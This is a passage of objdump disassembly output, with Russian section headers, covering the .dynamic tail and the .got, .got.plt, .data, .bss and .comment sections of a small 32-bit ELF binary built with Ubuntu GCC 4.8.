 8049f51:	81 04 08 05 00 00 00 	addl   $0x5,(%eax,%ecx,1)
 8049f58:	1c 82                	sbb    $0x82,%al
 8049f5a:	04 08                	add    $0x8,%al
 8049f5c:	06                   	push   %es
 8049f5d:	00 00                	add    %al,(%eax)
 8049f5f:	00 cc                	add    %cl,%ah
 8049f61:	81 04 08 0a 00 00 00 	addl   $0xa,(%eax,%ecx,1)
 8049f68:	60                   	pusha  
 8049f69:	00 00                	add    %al,(%eax)
 8049f6b:	00 0b                	add    %cl,(%ebx)
 8049f6d:	00 00                	add    %al,(%eax)
 8049f6f:	00 10                	add    %dl,(%eax)
 8049f71:	00 00                	add    %al,(%eax)
 8049f73:	00 15 00 00 00 00    	add    %dl,0x0
 8049f79:	00 00                	add    %al,(%eax)
 8049f7b:	00 03                	add    %al,(%ebx)
 8049f7d:	00 00                	add    %al,(%eax)
 8049f7f:	00 00                	add    %al,(%eax)
 8049f81:	a0 04 08 02 00       	mov    0x20804,%al
 8049f86:	00 00                	add    %al,(%eax)
 8049f88:	18 00                	sbb    %al,(%eax)
 8049f8a:	00 00                	add    %al,(%eax)
 8049f8c:	14 00                	adc    $0x0,%al
 8049f8e:	00 00                	add    %al,(%eax)
 8049f90:	11 00                	adc    %eax,(%eax)
 8049f92:	00 00                	add    %al,(%eax)
 8049f94:	17                   	pop    %ss
 8049f95:	00 00                	add    %al,(%eax)
 8049f97:	00 c0                	add    %al,%al
 8049f99:	82                   	(bad)  
 8049f9a:	04 08                	add    $0x8,%al
 8049f9c:	11 00                	adc    %eax,(%eax)
 8049f9e:	00 00                	add    %al,(%eax)
 8049fa0:	b8 82 04 08 12       	mov    $0x12080482,%eax
 8049fa5:	00 00                	add    %al,(%eax)
 8049fa7:	00 08                	add    %cl,(%eax)
 8049fa9:	00 00                	add    %al,(%eax)
 8049fab:	00 13                	add    %dl,(%ebx)
 8049fad:	00 00                	add    %al,(%eax)
 8049faf:	00 08                	add    %cl,(%eax)
 8049fb1:	00 00                	add    %al,(%eax)
 8049fb3:	00 fe                	add    %bh,%dh
 8049fb5:	ff                   	(bad)  
 8049fb6:	ff 6f 88             	ljmp   *-0x78(%edi)
 8049fb9:	82                   	(bad)  
 8049fba:	04 08                	add    $0x8,%al
 8049fbc:	ff                   	(bad)  
 8049fbd:	ff                   	(bad)  
 8049fbe:	ff 6f 01             	ljmp   *0x1(%edi)
 8049fc1:	00 00                	add    %al,(%eax)
 8049fc3:	00 f0                	add    %dh,%al
 8049fc5:	ff                   	(bad)  
 8049fc6:	ff 6f 7c             	ljmp   *0x7c(%edi)
 8049fc9:	82                   	(bad)  
 8049fca:	04 08                	add    $0x8,%al
	...

Дизассемблирование раздела .got:

08049ffc <.got>:
 8049ffc:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .got.plt:

0804a000 <_GLOBAL_OFFSET_TABLE_>:
 804a000:	14 9f                	adc    $0x9f,%al
 804a002:	04 08                	add    $0x8,%al
	...
 804a00c:	16                   	push   %ss
 804a00d:	83 04 08 26          	addl   $0x26,(%eax,%ecx,1)
 804a011:	83 04 08 36          	addl   $0x36,(%eax,%ecx,1)
 804a015:	83                   	.byte 0x83
 804a016:	04 08                	add    $0x8,%al

Дизассемблирование раздела .data:

0804a018 <__data_start>:
 804a018:	00 00                	add    %al,(%eax)
	...

0804a01c <__dso_handle>:
 804a01c:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .bss:

0804a020 <__bss_start>:
 804a020:	00 00                	add    %al,(%eax)
	...

Дизассемблирование раздела .comment:

00000000 <.comment>:
   0:	47                   	inc    %edi
   1:	43                   	inc    %ebx
   2:	43                   	inc    %ebx
   3:	3a 20                	cmp    (%eax),%ah
   5:	28 55 62             	sub    %dl,0x62(%ebp)
   8:	75 6e                	jne    78 <_init-0x8048260>
   a:	74 75                	je     81 <_init-0x8048257>
   c:	20 34 2e             	and    %dh,(%esi,%ebp,1)
   f:	38 2e                	cmp    %ch,(%esi)
  11:	34 2d                	xor    $0x2d,%al
  13:	32 75 62             	xor    0x62(%ebp),%dh
  16:	75 6e                	jne    86 <_init-0x8048252>
  18:	74 75                	je     8f <_init-0x8048249>
  1a:	31 7e 31             	xor    %edi,0x31(%esi)
  1d:	34 2e                	xor    $0x2e,%al
  1f:	30 34 29             	xor    %dh,(%ecx,%ebp,1)
  22:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  25:	38 2e                	cmp    %ch,(%esi)
  27:	34 00                	xor    $0x0,%al
  29:	47                   	inc    %edi
  2a:	43                   	inc    %ebx
  2b:	43                   	inc    %ebx
  2c:	3a 20                	cmp    (%eax),%ah
  2e:	28 55 62             	sub    %dl,0x62(%ebp)
  31:	75 6e                	jne    a1 <_init-0x8048237>
  33:	74 75                	je     aa <_init-0x804822e>
  35:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  38:	38 2e                	cmp    %ch,(%esi)
  3a:	32 2d 31 39 75 62    	xor    0x62753931,%ch
  40:	75 6e                	jne    b0 <_init-0x8048228>
  42:	74 75                	je     b9 <_init-0x804821f>
  44:	31 29                	xor    %ebp,(%ecx)
  46:	20 34 2e             	and    %dh,(%esi,%ebp,1)
  49:	38 2e                	cmp    %ch,(%esi)
  4b:	32 00                	xor    (%eax),%al
